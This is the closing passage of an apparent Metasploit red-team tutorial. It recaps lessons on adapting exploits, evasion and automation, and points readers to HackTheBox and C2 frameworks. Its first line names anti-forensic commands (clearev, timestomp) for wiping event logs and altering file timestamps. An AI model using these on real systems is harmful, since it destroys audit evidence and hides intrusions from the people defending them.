✅ Clear logs: clearev + timestomp. Wiping the Security log writes event 1102 (audit log cleared), which is itself a high-fidelity alert on any monitored host.


Conclusion

You’re now equipped with advanced Metasploit techniques. Key takeaways:

  • Public exploits are starting points; adapting them to the target’s build and mitigations is what makes them work.

  • Evasion is critical for red team ops.

  • Automation scales attacks.

What’s next?

  • Practice on Advanced HackTheBox machines.

  • Learn C2 frameworks (Cobalt Strike, Sliver).

  • Study real-world APT reports for tradecraft.

Disclaimer: This content is for educational purposes only.

🚀 Time to go pro! 🚀